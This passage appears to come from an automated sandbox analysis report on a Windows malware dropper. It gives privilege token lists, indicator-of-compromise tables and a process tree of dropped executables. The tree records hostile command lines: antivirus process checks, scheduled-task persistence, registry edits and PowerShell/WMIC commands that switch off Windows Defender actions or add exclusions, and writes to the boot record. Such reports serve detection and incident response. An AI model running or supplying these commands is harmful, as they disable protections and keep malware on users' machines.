3268 WMIC.exe Token: SeRestorePrivilege 3268 WMIC.exe Token: SeShutdownPrivilege 3268 WMIC.exe Token: SeDebugPrivilege 3268 WMIC.exe Token: SeSystemEnvironmentPrivilege 3268 WMIC.exe Token: SeRemoteShutdownPrivilege 3268 WMIC.exe Token: SeUndockPrivilege 3268 WMIC.exe Token: SeManageVolumePrivilege 3268 WMIC.exe Token: 33 3268 WMIC.exe Token: 34 3268 WMIC.exe Token: 35 3268 WMIC.exe Token: 36 3268 WMIC.exe Token: SeIncreaseQuotaPrivilege 3268 WMIC.exe Token: SeSecurityPrivilege 3268 WMIC.exe Token: SeTakeOwnershipPrivilege 3268 WMIC.exe Token: SeLoadDriverPrivilege 3268 WMIC.exe Token: SeSystemProfilePrivilege 3268 WMIC.exe Token: SeSystemtimePrivilege 3268 WMIC.exe Token: SeProfSingleProcessPrivilege 3268 WMIC.exe Token: SeIncBasePriorityPrivilege 3268 WMIC.exe Token: SeCreatePagefilePrivilege 3268 WMIC.exe Token: SeBackupPrivilege 3268 WMIC.exe Token: SeRestorePrivilege 3268 WMIC.exe Token: SeShutdownPrivilege 3268 WMIC.exe Token: SeDebugPrivilege 3268 WMIC.exe Token: SeSystemEnvironmentPrivilege 3268 WMIC.exe Token: SeRemoteShutdownPrivilege 3268 WMIC.exe Token: SeUndockPrivilege 3268 WMIC.exe Token: SeManageVolumePrivilege 3268 WMIC.exe Token: 33 3268 WMIC.exe Token: 34 3268 WMIC.exe Token: 35 3268 WMIC.exe Token: 36 3268 WMIC.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
Processes:
Fighting.pifgo.exewxijgyp.exezwuivg.exewsiopohwqsd.exeQEwecfyhj.exegywervcyuj.exengown.execrt.tmppid process 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4052 go.exe 4052 go.exe 4052 go.exe 2464 wxijgyp.exe 2464 wxijgyp.exe 5680 zwuivg.exe 5680 zwuivg.exe 6360 wsiopohwqsd.exe 6360 wsiopohwqsd.exe 6116 QEwecfyhj.exe 6116 QEwecfyhj.exe 5672 gywervcyuj.exe 5672 gywervcyuj.exe 5984 ngown.exe 5984 ngown.exe 7064 crt.tmp -
Suspicious use of SendNotifyMessage 18 IoCs
Processes:
Fighting.pifgo.exewxijgyp.exezwuivg.exewsiopohwqsd.exeQEwecfyhj.exegywervcyuj.exengown.exepid process 4584 Fighting.pif 4584 Fighting.pif 4584 Fighting.pif 4052 go.exe 4052 go.exe 4052 go.exe 2464 wxijgyp.exe 2464 wxijgyp.exe 5680 zwuivg.exe 5680 zwuivg.exe 6360 wsiopohwqsd.exe 6360 wsiopohwqsd.exe 6116 QEwecfyhj.exe 6116 QEwecfyhj.exe 5672 gywervcyuj.exe 5672 gywervcyuj.exe 5984 ngown.exe 5984 ngown.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
svcs.exeregasms.exesvchos.exejsc.exeserver.execsrss.exeXClient.exepid process 5028 svcs.exe 4772 regasms.exe 4216 svchos.exe 5372 jsc.exe 6752 server.exe 6364 csrss.exe 1280 XClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New Text Document.exeMartDrum.execmd.execmd.exerem.exeFighting.pifZinckeds.exedescription pid process target process PID 4180 wrote to memory of 2508 4180 New Text Document.exe MartDrum.exe PID 4180 wrote to memory of 2508 4180 New Text Document.exe MartDrum.exe PID 4180 wrote to memory of 2508 4180 New Text Document.exe MartDrum.exe PID 2508 wrote to memory of 3428 2508 MartDrum.exe cmd.exe PID 2508 wrote to memory of 3428 2508 MartDrum.exe cmd.exe PID 2508 wrote to memory of 3428 2508 MartDrum.exe cmd.exe PID 4180 wrote to memory of 3052 4180 New Text Document.exe 4.exe PID 4180 wrote to memory of 3052 4180 New Text Document.exe 4.exe PID 4180 wrote to memory of 3052 4180 New Text Document.exe 4.exe PID 3428 wrote to memory of 2356 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 2356 3428 cmd.exe cmd.exe PID 3428 wrote to memory of 2356 3428 cmd.exe cmd.exe PID 4180 wrote to memory of 4436 4180 New Text Document.exe start.exe PID 4180 wrote to memory of 4436 4180 New Text Document.exe start.exe PID 4180 wrote to memory of 4436 4180 New Text Document.exe start.exe PID 4180 wrote to memory of 3524 4180 New Text Document.exe rem.exe PID 4180 wrote to memory of 3524 4180 New Text Document.exe rem.exe PID 4180 wrote to memory of 3524 4180 New Text Document.exe rem.exe PID 2356 wrote to memory of 3020 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 3020 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 3020 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 5088 2356 cmd.exe findstr.exe PID 2356 wrote to memory of 5088 2356 cmd.exe findstr.exe PID 2356 wrote to memory of 5088 2356 cmd.exe findstr.exe PID 3524 wrote to memory of 5028 3524 rem.exe svcs.exe PID 3524 wrote to memory of 5028 3524 rem.exe svcs.exe PID 3524 wrote to memory of 5028 3524 rem.exe svcs.exe PID 2356 wrote to memory of 4920 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 4920 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 4920 2356 cmd.exe tasklist.exe PID 2356 wrote to memory of 3808 2356 cmd.exe svchost.exe PID 2356 wrote to memory of 3808 2356 cmd.exe svchost.exe PID 2356 wrote to memory of 3808 2356 cmd.exe svchost.exe PID 2356 wrote to memory of 4848 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4848 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4848 2356 cmd.exe cmd.exe PID 4180 wrote to memory of 3356 4180 New Text Document.exe rooma.exe PID 4180 wrote to memory of 3356 4180 New Text Document.exe rooma.exe PID 4180 wrote to memory of 3356 4180 New Text Document.exe rooma.exe PID 2356 wrote to memory of 1524 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 1524 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 1524 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 3204 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 3204 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 3204 2356 cmd.exe cmd.exe PID 2356 wrote to memory of 4584 2356 cmd.exe Fighting.pif PID 2356 wrote to memory of 4584 2356 cmd.exe Fighting.pif PID 2356 wrote to memory of 4584 2356 cmd.exe Fighting.pif PID 2356 wrote to memory of 1276 2356 cmd.exe PING.EXE PID 2356 wrote to memory of 1276 2356 cmd.exe PING.EXE PID 2356 wrote to memory of 1276 2356 cmd.exe PING.EXE PID 4584 wrote to memory of 4376 4584 Fighting.pif cmd.exe PID 4584 wrote to memory of 4376 4584 Fighting.pif cmd.exe PID 4584 wrote to memory of 4376 4584 Fighting.pif cmd.exe PID 4180 wrote to memory of 4772 4180 New Text Document.exe regasms.exe PID 4180 wrote to memory of 4772 4180 New Text Document.exe regasms.exe PID 4180 wrote to memory of 4772 4180 New Text Document.exe regasms.exe PID 4180 wrote to memory of 2676 4180 New Text Document.exe Zinck2.exe PID 4180 wrote to memory of 2676 4180 New Text Document.exe Zinck2.exe PID 4180 wrote to memory of 2676 4180 New Text Document.exe Zinck2.exe PID 4180 wrote to memory of 4948 4180 New Text Document.exe Zinckeds.exe PID 4180 wrote to memory of 4948 4180 New Text Document.exe Zinckeds.exe PID 4180 wrote to memory of 4948 4180 New Text Document.exe Zinckeds.exe PID 4948 wrote to memory of 2804 4948 Zinckeds.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 5796 attrib.exe 3156 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"2⤵
- Checks computer location settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\MartDrum.exe"C:\Users\Admin\AppData\Local\Temp\a\MartDrum.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir 187216⤵
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Cock + Enhance + Forest + Grocery + Mall 18721\Fighting.pif6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Amd + Backed 18721\Q6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\18721\Fighting.pif18721\Fighting.pif 18721\Q6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\a\4.exe"C:\Users\Admin\AppData\Local\Temp\a\4.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 3524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\start.exe"C:\Users\Admin\AppData\Local\Temp\a\start.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\Admin\AppData\Roaming\svchos.exe"' & exit4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\Admin\AppData\Roaming\svchos.exe"'5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3A.tmp.bat""4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\svchos.exe"C:\Users\Admin\AppData\Roaming\svchos.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\rem.exe"C:\Users\Admin\AppData\Local\Temp\a\rem.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\microsofts\svcs.exe"C:\Users\Admin\AppData\Roaming\microsofts\svcs.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\rooma.exe"C:\Users\Admin\AppData\Local\Temp\a\rooma.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\a\regasms.exe"C:\Users\Admin\AppData\Local\Temp\a\regasms.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\Zinck2.exe"C:\Users\Admin\AppData\Local\Temp\a\Zinck2.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 5764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 5884⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Zinckeds.exe"C:\Users\Admin\AppData\Local\Temp\a\Zinckeds.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 2604⤵
- Program crash
-
C:\Windows\SysWOW64\netbtugc.exe"C:\Windows\SysWOW64\netbtugc.exe"3⤵
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\go.exe"C:\Users\Admin\AppData\Local\Temp\a\go.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\aaaaaaaa.exe"C:\Users\Admin\AppData\Local\Temp\a\aaaaaaaa.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\a\server.exe"C:\Users\Admin\AppData\Local\Temp\a\server.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe"C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\time2time.exe"C:\Users\Admin\AppData\Local\Temp\a\time2time.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\an4IhMEUJGaXcuvcgGd8PX9U.exe"C:\Users\Admin\Pictures\an4IhMEUJGaXcuvcgGd8PX9U.exe" /s5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=6⤵
-
C:\Program Files (x86)\1716744628_0\360TS_Setup.exe"C:\Program Files (x86)\1716744628_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall7⤵
-
C:\Users\Admin\Pictures\oiktbrfhNygCPSFVdJ1Rkgku.exe"C:\Users\Admin\Pictures\oiktbrfhNygCPSFVdJ1Rkgku.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\i4NmxEpmuAkauKUZZPpG91uN.exe"C:\Users\Admin\Pictures\i4NmxEpmuAkauKUZZPpG91uN.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe.\Install.exe /odidum "385118" /S6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe\" it /giAdidFZjj 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵
-
C:\Users\Admin\AppData\Local\Temp\a\file300un.exe"C:\Users\Admin\AppData\Local\Temp\a\file300un.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\AIrj5QVEYuGuBGBtXUl948x8.exe"C:\Users\Admin\Pictures\AIrj5QVEYuGuBGBtXUl948x8.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 3526⤵
- Program crash
-
C:\Users\Admin\Pictures\dheliGO8vZJZX17tAGdW1JAq.exe"C:\Users\Admin\Pictures\dheliGO8vZJZX17tAGdW1JAq.exe" /s5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe"C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe"5⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\eZLzlDEi6dGI8UUD1hmA2jyZ.exe"C:\Users\Admin\Pictures\eZLzlDEi6dGI8UUD1hmA2jyZ.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe.\Install.exe /odidum "385118" /S6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵
-
